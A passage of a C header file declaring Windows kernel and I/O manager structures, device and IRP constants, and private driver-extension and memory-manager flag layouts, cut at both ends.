UCHAR MutantSize;\n BOOLEAN DpcActive;\n UCHAR MutantReserved;\n } DUMMYSTRUCTNAME6;\n } DUMMYUNIONNAME;\n\n LONG SignalState; // Object lock\n LIST_ENTRY WaitListHead; // Object lock\n} DISPATCHER_HEADER, *PDISPATCHER_HEADER;\n\ntypedef struct _KEVENT {\n DISPATCHER_HEADER Header;\n} KEVENT, *PKEVENT, *PRKEVENT;\n\ntypedef struct _FAST_MUTEX {\n LONG_PTR Count;\n void *Owner;\n ULONG Contention;\n struct _KEVENT Event;\n ULONG OldIrql;\n LONG __PADDING__[1];\n} FAST_MUTEX, *PFAST_MUTEX;\n\ntypedef struct _KMUTANT {\n DISPATCHER_HEADER Header;\n LIST_ENTRY MutantListEntry;\n struct _KTHREAD *OwnerThread;\n BOOLEAN Abandoned;\n UCHAR ApcDisable;\n} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;\n\ntypedef struct _KSEMAPHORE {\n DISPATCHER_HEADER Header;\n LONG Limit;\n} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;\n\ntypedef struct _KTIMER {\n DISPATCHER_HEADER Header;\n ULARGE_INTEGER DueTime;\n LIST_ENTRY TimerListEntry;\n struct _KDPC *Dpc;\n ULONG Processor;\n LONG Period;\n} KTIMER, *PKTIMER, *PRKTIMER;\n\ntypedef struct _KDEVICE_QUEUE_ENTRY {\n LIST_ENTRY DeviceListEntry;\n ULONG SortKey;\n BOOLEAN Inserted;\n} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;\n\ntypedef enum _KDPC_IMPORTANCE {\n LowImportance,\n MediumImportance,\n HighImportance\n} KDPC_IMPORTANCE;\n\ntypedef struct _KDPC {\n union {\n ULONG TargetInfoAsUlong;\n struct {\n UCHAR Type;\n UCHAR Importance;\n volatile USHORT Number;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n\n SINGLE_LIST_ENTRY DpcListEntry;\n KAFFINITY ProcessorHistory;\n PVOID DeferredRoutine;\n PVOID DeferredContext;\n PVOID SystemArgument1;\n PVOID SystemArgument2;\n __volatile PVOID DpcData;\n} KDPC, *PKDPC, *PRKDPC;\n\ntypedef struct _WAIT_CONTEXT_BLOCK {\n union {\n KDEVICE_QUEUE_ENTRY WaitQueueEntry;\n struct {\n LIST_ENTRY DmaWaitEntry;\n ULONG NumberOfChannels;\n ULONG SyncCallback : 1;\n ULONG DmaContext : 1;\n ULONG Reserved : 30;\n };\n };\n PVOID DeviceRoutine;\n PVOID DeviceContext;\n ULONG NumberOfMapRegisters;\n PVOID DeviceObject;\n PVOID CurrentIrp;\n PKDPC BufferChainingDpc;\n} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;\n\n#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters\n\ntypedef struct _VPB {\n CSHORT Type;\n CSHORT Size;\n USHORT Flags;\n USHORT VolumeLabelLength; // in bytes\n struct _DEVICE_OBJECT *DeviceObject;\n struct _DEVICE_OBJECT *RealDevice;\n ULONG SerialNumber;\n ULONG ReferenceCount;\n WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];\n} VPB, *PVPB;\n\ntypedef struct _KQUEUE {\n DISPATCHER_HEADER Header;\n LIST_ENTRY EntryListHead;\n ULONG CurrentCount;\n ULONG MaximumCount;\n LIST_ENTRY ThreadListHead;\n} KQUEUE, *PKQUEUE;\n\ntypedef struct _KDEVICE_QUEUE {\n CSHORT Type;\n CSHORT Size;\n LIST_ENTRY DeviceListHead;\n KSPIN_LOCK Lock;\n\n#if defined(_AMD64_)\n\n union {\n BOOLEAN Busy;\n struct {\n LONG64 Reserved : 8;\n LONG64 Hint : 56;\n };\n };\n\n#else\n\n BOOLEAN Busy;\n\n#endif\n\n} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;\n\nenum _KOBJECTS {\n EventNotificationObject = 0x0,\n EventSynchronizationObject = 0x1,\n MutantObject = 0x2,\n ProcessObject = 0x3,\n QueueObject = 0x4,\n SemaphoreObject = 0x5,\n ThreadObject = 0x6,\n GateObject = 0x7,\n TimerNotificationObject = 0x8,\n TimerSynchronizationObject = 0x9,\n Spare2Object = 0xa,\n Spare3Object = 0xb,\n Spare4Object = 0xc,\n Spare5Object = 0xd,\n Spare6Object = 0xe,\n Spare7Object = 0xf,\n Spare8Object = 0x10,\n Spare9Object = 0x11,\n ApcObject = 0x12,\n DpcObject = 0x13,\n DeviceQueueObject = 0x14,\n EventPairObject = 0x15,\n InterruptObject = 0x16,\n ProfileObject = 0x17,\n ThreadedDpcObject = 0x18,\n MaximumKernelObject = 0x19,\n};\n\n#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm\n#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm\n#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm\n#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm\n#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm\n#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs\n#define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm\n#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs\n#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs\n#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs\n#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm\n#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm\n#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm\n#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm\n#define DO_POWER_NOOP 0x00008000\n#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs\n#define DO_XIP 0x00020000\n#define DO_DEVICE_TO_BE_RESET 0x04000000 \n#define DO_DAX_VOLUME 0x10000000 \n\n#define FILE_REMOVABLE_MEDIA 0x00000001\n#define FILE_READ_ONLY_DEVICE 0x00000002\n#define FILE_FLOPPY_DISKETTE 0x00000004\n#define FILE_WRITE_ONCE_MEDIA 0x00000008\n#define FILE_REMOTE_DEVICE 0x00000010\n#define FILE_DEVICE_IS_MOUNTED 0x00000020\n#define FILE_VIRTUAL_VOLUME 0x00000040\n#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080\n#define FILE_DEVICE_SECURE_OPEN 0x00000100\n#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800\n#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000\n#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000\n#define FILE_CHARACTERISTIC_CSV 0x00010000\n#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000\n#define FILE_PORTABLE_DEVICE 0x00040000\n\n#define FILE_DEVICE_BEEP 0x00000001\n#define FILE_DEVICE_CD_ROM 0x00000002\n#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003\n#define FILE_DEVICE_CONTROLLER 0x00000004\n#define FILE_DEVICE_DATALINK 0x00000005\n#define FILE_DEVICE_DFS 0x00000006\n#define FILE_DEVICE_DISK 0x00000007\n#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008\n#define FILE_DEVICE_FILE_SYSTEM 0x00000009\n#define FILE_DEVICE_INPORT_PORT 0x0000000a\n#define FILE_DEVICE_KEYBOARD 0x0000000b\n#define FILE_DEVICE_MAILSLOT 0x0000000c\n#define FILE_DEVICE_MIDI_IN 0x0000000d\n#define FILE_DEVICE_MIDI_OUT 0x0000000e\n#define FILE_DEVICE_MOUSE 0x0000000f\n#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010\n#define FILE_DEVICE_NAMED_PIPE 0x00000011\n#define FILE_DEVICE_NETWORK 0x00000012\n#define FILE_DEVICE_NETWORK_BROWSER 0x00000013\n#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014\n#define FILE_DEVICE_NULL 0x00000015\n#define FILE_DEVICE_PARALLEL_PORT 0x00000016\n#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017\n#define FILE_DEVICE_PRINTER 0x00000018\n#define FILE_DEVICE_SCANNER 0x00000019\n#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a\n#define FILE_DEVICE_SERIAL_PORT 0x0000001b\n#define FILE_DEVICE_SCREEN 0x0000001c\n#define FILE_DEVICE_SOUND 0x0000001d\n#define FILE_DEVICE_STREAMS 0x0000001e\n#define FILE_DEVICE_TAPE 0x0000001f\n#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020\n#define FILE_DEVICE_TRANSPORT 0x00000021\n#define FILE_DEVICE_UNKNOWN 0x00000022\n#define FILE_DEVICE_VIDEO 0x00000023\n#define FILE_DEVICE_VIRTUAL_DISK 0x00000024\n#define FILE_DEVICE_WAVE_IN 0x00000025\n#define FILE_DEVICE_WAVE_OUT 0x00000026\n#define FILE_DEVICE_8042_PORT 0x00000027\n#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028\n#define FILE_DEVICE_BATTERY 0x00000029\n#define FILE_DEVICE_BUS_EXTENDER 0x0000002a\n#define FILE_DEVICE_MODEM 0x0000002b\n#define FILE_DEVICE_VDM 0x0000002c\n#define FILE_DEVICE_MASS_STORAGE 0x0000002d\n#define FILE_DEVICE_SMB 0x0000002e\n#define FILE_DEVICE_KS 0x0000002f\n#define FILE_DEVICE_CHANGER 0x00000030\n#define FILE_DEVICE_SMARTCARD 0x00000031\n#define FILE_DEVICE_ACPI 0x00000032\n#define FILE_DEVICE_DVD 0x00000033\n#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034\n#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035\n#define FILE_DEVICE_DFS_VOLUME 0x00000036\n#define FILE_DEVICE_SERENUM 0x00000037\n#define FILE_DEVICE_TERMSRV 0x00000038\n#define FILE_DEVICE_KSEC 0x00000039\n#define FILE_DEVICE_FIPS 0x0000003A\n#define FILE_DEVICE_INFINIBAND 0x0000003B\n#define FILE_DEVICE_VMBUS 0x0000003E\n#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F\n#define FILE_DEVICE_WPD 0x00000040\n#define FILE_DEVICE_BLUETOOTH 0x00000041\n#define FILE_DEVICE_MT_COMPOSITE 0x00000042\n#define FILE_DEVICE_MT_TRANSPORT 0x00000043\n#define FILE_DEVICE_BIOMETRIC 0x00000044\n#define FILE_DEVICE_PMI 0x00000045\n#define FILE_DEVICE_EHSTOR 0x00000046\n#define FILE_DEVICE_DEVAPI 0x00000047\n#define FILE_DEVICE_GPIO 0x00000048\n#define FILE_DEVICE_USBEX 0x00000049\n#define FILE_DEVICE_CONSOLE 0x00000050\n#define FILE_DEVICE_NFP 0x00000051\n#define FILE_DEVICE_SYSENV 0x00000052\n#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053\n#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054\n#define FILE_DEVICE_STORAGE_REPLICATION 0x00000055\n#define FILE_DEVICE_TRUST_ENV 0x00000056\n#define FILE_DEVICE_UCM 0x00000057\n#define FILE_DEVICE_UCMTCPCI 0x00000058\n#define FILE_DEVICE_PERSISTENT_MEMORY 0x00000059\n#define FILE_DEVICE_NVDIMM 0x0000005a\n#define FILE_DEVICE_HOLOGRAPHIC 0x0000005b\n#define FILE_DEVICE_SDFXHCI 0x0000005c\n#define FILE_DEVICE_UCMUCSI 0x0000005d\n\n#define FILE_BYTE_ALIGNMENT 0x00000000\n#define FILE_WORD_ALIGNMENT 0x00000001\n#define FILE_LONG_ALIGNMENT 0x00000003\n#define FILE_QUAD_ALIGNMENT 0x00000007\n#define FILE_OCTA_ALIGNMENT 0x0000000f\n#define FILE_32_BYTE_ALIGNMENT 0x0000001f\n#define FILE_64_BYTE_ALIGNMENT 0x0000003f\n#define FILE_128_BYTE_ALIGNMENT 0x0000007f\n#define FILE_256_BYTE_ALIGNMENT 0x000000ff\n#define FILE_512_BYTE_ALIGNMENT 0x000001ff\n\n#define DPC_NORMAL 0\n#define DPC_THREADED 1\n\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#pragma warning(disable:4324) // structure was padded due to __declspec(align())\n#endif\n\ntypedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _DEVICE_OBJECT {\n CSHORT Type;\n USHORT Size;\n LONG ReferenceCount;\n struct _DRIVER_OBJECT* DriverObject;\n struct _DEVICE_OBJECT* NextDevice;\n struct _DEVICE_OBJECT* AttachedDevice;\n struct _IRP* CurrentIrp;\n PIO_TIMER Timer;\n ULONG Flags; // See above: DO_...\n ULONG Characteristics; // See ntioapi: FILE_...\n __volatile PVPB Vpb;\n PVOID DeviceExtension;\n DEVICE_TYPE DeviceType;\n CCHAR StackSize;\n union {\n LIST_ENTRY ListEntry;\n WAIT_CONTEXT_BLOCK Wcb;\n } Queue;\n ULONG AlignmentRequirement;\n KDEVICE_QUEUE DeviceQueue;\n KDPC Dpc;\n\n //\n // The following field is for exclusive use by the filesystem to keep\n // track of the number of Fsp threads currently using the device\n //\n\n ULONG ActiveThreadCount;\n PSECURITY_DESCRIPTOR SecurityDescriptor;\n KEVENT DeviceLock;\n\n USHORT SectorSize;\n USHORT Spare1;\n\n struct _DEVOBJ_EXTENSION* DeviceObjectExtension;\n PVOID Reserved;\n\n} DEVICE_OBJECT;\n\ntypedef struct _DEVICE_OBJECT* PDEVICE_OBJECT;\n\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\ntypedef struct _DEVOBJ_EXTENSION {\n\n CSHORT Type;\n USHORT Size;\n\n //\n // Public part of the DeviceObjectExtension structure\n //\n\n PDEVICE_OBJECT DeviceObject; // owning device object\n\n // end_ntddk end_nthal end_ntifs end_wdm end_ntosp\n\n //\n // Universal Power Data - all device objects must have this\n //\n\n ULONG PowerFlags; // see ntos\\po\\pop.h\n // WARNING: Access via PO macros\n // and with PO locking rules ONLY.\n\n //\n // Pointer to the non-universal power data\n // Power data that only some device objects need is stored in the\n // device object power extension -> DOPE\n // see po.h\n //\n\n struct _DEVICE_OBJECT_POWER_EXTENSION *Dope;\n\n //\n // power state information\n //\n\n //\n // Device object extension flags. Protected by the IopDatabaseLock.\n //\n\n ULONG ExtensionFlags;\n\n //\n // PnP manager fields\n //\n\n PVOID DeviceNode;\n\n //\n // AttachedTo is a pointer to the device object that this device\n // object is attached to. The attachment chain is now doubly\n // linked: this pointer and DeviceObject->AttachedDevice provide the\n // linkage.\n //\n\n PDEVICE_OBJECT AttachedTo;\n\n //\n // The next two fields are used to prevent recursion in IoStartNextPacket\n // interfaces.\n //\n\n LONG StartIoCount; // Used to keep track of number of pending start ios.\n LONG StartIoKey; // Next startio key\n ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks\n PVPB Vpb; // If not NULL contains the VPB of the mounted volume.\n // Set in the filesystem's volume device object.\n // This is a reverse VPB pointer.\n\n // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp\n\n} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;\n\ntypedef struct _FAST_IO_DISPATCH {\n ULONG SizeOfFastIoDispatch;\n PVOID FastIoCheckIfPossible;\n PVOID FastIoRead;\n PVOID FastIoWrite;\n PVOID FastIoQueryBasicInfo;\n PVOID FastIoQueryStandardInfo;\n PVOID FastIoLock;\n PVOID FastIoUnlockSingle;\n PVOID FastIoUnlockAll;\n PVOID FastIoUnlockAllByKey;\n PVOID FastIoDeviceControl;\n PVOID AcquireFileForNtCreateSection;\n PVOID ReleaseFileForNtCreateSection;\n PVOID FastIoDetachDevice;\n PVOID FastIoQueryNetworkOpenInfo;\n PVOID AcquireForModWrite;\n PVOID MdlRead;\n PVOID MdlReadComplete;\n PVOID PrepareMdlWrite;\n PVOID MdlWriteComplete;\n PVOID FastIoReadCompressed;\n PVOID FastIoWriteCompressed;\n PVOID MdlReadCompleteCompressed;\n PVOID MdlWriteCompleteCompressed;\n PVOID FastIoQueryOpen;\n PVOID ReleaseForModWrite;\n PVOID AcquireForCcFlush;\n PVOID ReleaseForCcFlush;\n} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;\n\n#define IO_TYPE_ADAPTER 0x00000001\n#define IO_TYPE_CONTROLLER 0x00000002\n#define IO_TYPE_DEVICE 0x00000003\n#define IO_TYPE_DRIVER 0x00000004\n#define IO_TYPE_FILE 0x00000005\n#define IO_TYPE_IRP 0x00000006\n#define IO_TYPE_MASTER_ADAPTER 0x00000007\n#define IO_TYPE_OPEN_PACKET 0x00000008\n#define IO_TYPE_TIMER 0x00000009\n#define IO_TYPE_VPB 0x0000000a\n#define IO_TYPE_ERROR_LOG 0x0000000b\n#define IO_TYPE_ERROR_MESSAGE 0x0000000c\n#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d\n\n#define IRP_MJ_CREATE 0x00\n#define IRP_MJ_CREATE_NAMED_PIPE 0x01\n#define IRP_MJ_CLOSE 0x02\n#define IRP_MJ_READ 0x03\n#define IRP_MJ_WRITE 0x04\n#define IRP_MJ_QUERY_INFORMATION 0x05\n#define IRP_MJ_SET_INFORMATION 0x06\n#define IRP_MJ_QUERY_EA 0x07\n#define IRP_MJ_SET_EA 0x08\n#define IRP_MJ_FLUSH_BUFFERS 0x09\n#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a\n#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b\n#define IRP_MJ_DIRECTORY_CONTROL 0x0c\n#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d\n#define IRP_MJ_DEVICE_CONTROL 0x0e\n#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f\n#define IRP_MJ_SHUTDOWN 0x10\n#define IRP_MJ_LOCK_CONTROL 0x11\n#define IRP_MJ_CLEANUP 0x12\n#define IRP_MJ_CREATE_MAILSLOT 0x13\n#define IRP_MJ_QUERY_SECURITY 0x14\n#define IRP_MJ_SET_SECURITY 0x15\n#define IRP_MJ_POWER 0x16\n#define IRP_MJ_SYSTEM_CONTROL 0x17\n#define IRP_MJ_DEVICE_CHANGE 0x18\n#define IRP_MJ_QUERY_QUOTA 0x19\n#define IRP_MJ_SET_QUOTA 0x1a\n#define IRP_MJ_PNP 0x1b\n#define IRP_MJ_PNP_POWER IRP_MJ_PNP \n#define IRP_MJ_MAXIMUM_FUNCTION 0x1b\n\n// Public structure\ntypedef struct _DRIVER_EXTENSION {\n\n //\n // Back pointer to Driver Object\n //\n\n struct _DRIVER_OBJECT *DriverObject;\n\n //\n // The AddDevice entry point is called by the Plug & Play manager\n // to inform the driver when a new device instance arrives that this\n // driver must control.\n //\n\n PVOID AddDevice;\n\n //\n // The count field is used to count the number of times the driver has\n // had its registered reinitialization routine invoked.\n //\n\n ULONG Count;\n\n //\n // The service name field is used by the pnp manager to determine\n // where the driver related info is stored in the registry.\n //\n\n UNICODE_STRING ServiceKeyName;\n\n} DRIVER_EXTENSION, *PDRIVER_EXTENSION;\n\n// Private, since 7.1\ntypedef struct _DRIVER_EXTENSION_V2 {\n struct _DRIVER_OBJECT* DriverObject;\n PVOID AddDevice;\n ULONG Count;\n UNICODE_STRING ServiceKeyName;\n struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n} DRIVER_EXTENSION_V2, * PDRIVER_EXTENSION_V2;\n\n// Private, since 8.0\ntypedef struct _DRIVER_EXTENSION_V3 {\n struct _DRIVER_OBJECT* DriverObject;\n PVOID AddDevice;\n ULONG Count;\n UNICODE_STRING ServiceKeyName;\n struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n PVOID KseCallbacks; //KernelShimEngine\n PVOID DvCallbacks; //DriverVerifier\n} DRIVER_EXTENSION_V3, * PDRIVER_EXTENSION_V3;\n\n// Private, since 8.1\ntypedef struct _DRIVER_EXTENSION_V4 {\n struct _DRIVER_OBJECT* DriverObject;\n PVOID AddDevice;\n ULONG Count;\n UNICODE_STRING ServiceKeyName;\n struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n PVOID KseCallbacks; //KernelShimEngine\n PVOID DvCallbacks; //DriverVerifier\n PVOID VerifierContext;\n} DRIVER_EXTENSION_V4, * PDRIVER_EXTENSION_V4;\n\n// Private, since 11 25XXX\ntypedef struct _DRIVER_EXTENSION_V5 {\n struct _DRIVER_OBJECT* DriverObject;\n PVOID AddDevice;\n ULONG Count;\n UNICODE_STRING ServiceKeyName;\n struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n PVOID KseCallbacks; //KernelShimEngine\n PVOID DvCallbacks; //DriverVerifier\n PVOID VerifierContext;\n struct _DRIVER_PROXY_EXTENSION* DriverProxyExtension;\n} DRIVER_EXTENSION_V5, * PDRIVER_EXTENSION_V5; /* size: 0x0058 */\n\n#define DRVO_UNLOAD_INVOKED 0x00000001\n#define DRVO_LEGACY_DRIVER 0x00000002\n#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr\n#define DRVO_REINIT_REGISTERED 0x00000008\n#define DRVO_INITIALIZED 0x00000010\n#define DRVO_BOOTREINIT_REGISTERED 0x00000020\n#define DRVO_LEGACY_RESOURCES 0x00000040\n// end_ntddk end_nthal end_ntifs end_ntosp\n#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack.\n// begin_ntddk begin_nthal begin_ntifs begin_ntosp\n\ntypedef struct _DRIVER_OBJECT {\n CSHORT Type;\n CSHORT Size;\n\n //\n // The following links all of the devices created by a single driver\n // together on a list, and the Flags word provides an extensible flag\n // location for driver objects.\n //\n\n PDEVICE_OBJECT DeviceObject;\n ULONG Flags;\n\n //\n // The following section describes where the driver is loaded. The count\n // field is used to count the number of times the driver has had its\n // registered reinitialization routine invoked.\n //\n\n PVOID DriverStart;\n ULONG DriverSize;\n PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY\n PDRIVER_EXTENSION DriverExtension;\n\n //\n // The driver name field is used by the error log thread\n // determine the name of the driver that an I/O request is/was bound.\n //\n\n UNICODE_STRING DriverName;\n\n //\n // The following section is for registry support. Thise is a pointer\n // to the path to the hardware information in the registry\n //\n\n PUNICODE_STRING HardwareDatabase;\n\n //\n // The following section contains the optional pointer to an array of\n // alternate entry points to a driver for \"fast I/O\" support. Fast I/O\n // is performed by invoking the driver routine directly with separate\n // parameters, rather than using the standard IRP call mechanism. Note\n // that these functions may only be used for synchronous I/O, and when\n // the file is cached.\n //\n\n PFAST_IO_DISPATCH FastIoDispatch;\n\n //\n // The following section describes the entry points to this particular\n // driver. Note that the major function dispatch table must be the last\n // field in the object so that it remains extensible.\n //\n\n PVOID DriverInit;\n PVOID DriverStartIo;\n PVOID DriverUnload;\n PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];\n\n} DRIVER_OBJECT;\ntypedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;\n\n//\n// The following structure is pointed to by the SectionObject pointer field\n// of a file object, and is allocated by the various NT file systems.\n//\n\ntypedef struct _SECTION_OBJECT_POINTERS {\n PVOID DataSectionObject;\n PVOID SharedCacheMap;\n PVOID ImageSectionObject;\n} SECTION_OBJECT_POINTERS;\ntypedef SECTION_OBJECT_POINTERS* PSECTION_OBJECT_POINTERS;\n\n//\n// Define the format of a completion message.\n//\n\ntypedef struct _IO_COMPLETION_CONTEXT {\n PVOID Port;\n PVOID Key;\n} IO_COMPLETION_CONTEXT, * PIO_COMPLETION_CONTEXT;\n\ntypedef struct _FILE_OBJECT {\n CSHORT Type;\n CSHORT Size;\n PDEVICE_OBJECT DeviceObject;\n PVPB Vpb;\n PVOID FsContext;\n PVOID FsContext2;\n PSECTION_OBJECT_POINTERS SectionObjectPointer;\n PVOID PrivateCacheMap;\n NTSTATUS FinalStatus;\n struct _FILE_OBJECT* RelatedFileObject;\n BOOLEAN LockOperation;\n BOOLEAN DeletePending;\n BOOLEAN ReadAccess;\n BOOLEAN WriteAccess;\n BOOLEAN DeleteAccess;\n BOOLEAN SharedRead;\n BOOLEAN SharedWrite;\n BOOLEAN SharedDelete;\n ULONG Flags;\n UNICODE_STRING FileName;\n LARGE_INTEGER CurrentByteOffset;\n __volatile ULONG Waiters;\n __volatile ULONG Busy;\n PVOID LastLock;\n KEVENT Lock;\n KEVENT Event;\n __volatile PIO_COMPLETION_CONTEXT CompletionContext;\n KSPIN_LOCK IrpListLock;\n LIST_ENTRY IrpList;\n __volatile PVOID FileObjectExtension;\n} FILE_OBJECT;\ntypedef struct _FILE_OBJECT* PFILE_OBJECT;\n\ntypedef ULONG_PTR ERESOURCE_THREAD;\ntypedef ERESOURCE_THREAD* PERESOURCE_THREAD;\n\ntypedef struct _OWNER_ENTRY {\n ERESOURCE_THREAD OwnerThread;\n union {\n LONG OwnerCount;\n ULONG TableSize;\n };\n\n} OWNER_ENTRY, *POWNER_ENTRY;\n\ntypedef struct _ERESOURCE {\n LIST_ENTRY SystemResourcesList;\n POWNER_ENTRY OwnerTable;\n SHORT ActiveCount;\n USHORT Flag;\n PKSEMAPHORE SharedWaiters;\n PKEVENT ExclusiveWaiters;\n OWNER_ENTRY OwnerThreads[2];\n ULONG ContentionCount;\n USHORT NumberOfSharedWaiters;\n USHORT NumberOfExclusiveWaiters;\n union {\n PVOID Address;\n ULONG_PTR CreatorBackTraceIndex;\n };\n\n KSPIN_LOCK SpinLock;\n} ERESOURCE, *PERESOURCE;\n\n/*\n* WDM END\n*/\n\n/*\n* MM START\n*/\ntypedef ULONG MMSECTION_FLAGS2;\n\ntypedef struct _MMEXTEND_INFO {\n ULONG_PTR CommittedSize;\n ULONG ReferenceCount;\n} MMEXTEND_INFO, * PMMEXTEND_INFO; /* size: 0x0010 */\n\n//\n// Flags definitions valid only for Windows 10.\n//\ntypedef struct _MMSECTION_FLAGS {\n struct {\n UINT BeingDeleted : 1; /* bit position: 0 */\n UINT BeingCreated : 1; /* bit position: 1 */\n UINT BeingPurged : 1; /* bit position: 2 */\n UINT NoModifiedWriting : 1; /* bit position: 3 */\n UINT FailAllIo : 1; /* bit position: 4 */\n UINT Image : 1; /* bit position: 5 */\n UINT Based : 1; /* bit position: 6 */\n UINT File : 1; /* bit position: 7 */\n UINT AttemptingDelete : 1; /* bit position: 8 */\n UINT PrefetchCreated : 1; /* bit position: 9 */\n UINT PhysicalMemory : 1; /* bit position: 10 */\n UINT ImageControlAreaOnRemovableMedia : 1; /* bit position: 11 */ //CopyOnWrite\n UINT Reserve : 1; /* bit position: 12 */\n UINT Commit : 1; /* bit position: 13 */\n UINT NoChange : 1; /* bit position: 14 */\n UINT WasPurged : 1; /* bit position: 15 */\n UINT UserReference : 1; /* bit position: 16 */\n UINT GlobalMemory : 1; /* bit position: 17 */\n UINT DeleteOnClose : 1; /* bit position: 18 */\n UINT FilePointerNull : 1; /* bit position: 19 */\n UINT PreferredNode : 6; /* bit position: 20 */\n UINT GlobalOnlyPerSession : 1; /* bit position: 26 */\n UINT UserWritable : 1; /* bit position: 27 */\n UINT SystemVaAllocated : 1; /* bit position: 28 */\n UINT PreferredFsCompressionBoundary : 1; /* bit position: 29 */\n UINT UsingFileExtents : 1; /* bit position: 30 */\n UINT PageSize64K : 1; /* bit position: 31 */\n };\n} MMSECTION_FLAGS, * PMMSECTION_FLAGS; /* size: 0x0004 */\n\n//\n// Flags definitions valid only for Windows 10.\n//\ntypedef struct _SEGMENT_FLAGS {\n union {\n struct {\n USHORT TotalNumberOfPtes4132 : 10; /* bit position: 0 */\n USHORT Spare0 : 2; /* bit position: 10 */\n USHORT LargePages : 1; /* bit position: 12 */\n USHORT DebugSymbolsLoaded : 1; /* bit position: 13 */\n USHORT WriteCombined : 1; /* bit position: 14 */\n USHORT NoCache : 1; /* bit position: 15 */\n }; \n USHORT Short0;\n }; /* size: 0x0002 */\n union {\n struct {\n UCHAR FloppyMedia : 1; /* bit position: 0 */\n UCHAR DefaultProtectionMask : 5; /* bit position: 1 */\n UCHAR Binary32 : 1; /* bit position: 6 */\n UCHAR ContainsDebug : 1; /* bit position: 7 */\n };\n UCHAR UChar1;\n }; /* size: 0x0001 */\n union {\n struct {\n UCHAR ForceCollision : 1; /* bit position: 0 */\n UCHAR ImageSigningType : 3; /* bit position: 1 */\n UCHAR ImageSigningLevel : 4; /* bit position: 4 */\n };\n UCHAR UChar2;\n };\n} SEGMENT_FLAGS, * PSEGMENT_FLAGS; /* size: 0x0004 */\n\ntypedef struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES {\n union {\n ULONGLONG NumberOfPtes : 6;\n ULONGLONG PartitionId : 10;\n ULONGLONG Spare : 2;\n ULONGLONG SectionOffset : 48;\n } u1;\n} MI_SYSTEM_CACHE_VIEW_ATTRIBUTES, * PMI_SYSTEM_CACHE_VIEW_ATTRIBUTES;\n\n#define VIEW_MAP_TYPE_PROCESS 1\n#define VIEW_MAP_TYPE_SESSION 2\n#define VIEW_MAP_TYPE_SYSTEM_CACHE 3\n\ntypedef struct _MI_REVERSE_VIEW_MAP {\n struct _LIST_ENTRY ViewLinks;\n union {\n VOID* SystemCacheVa;\n 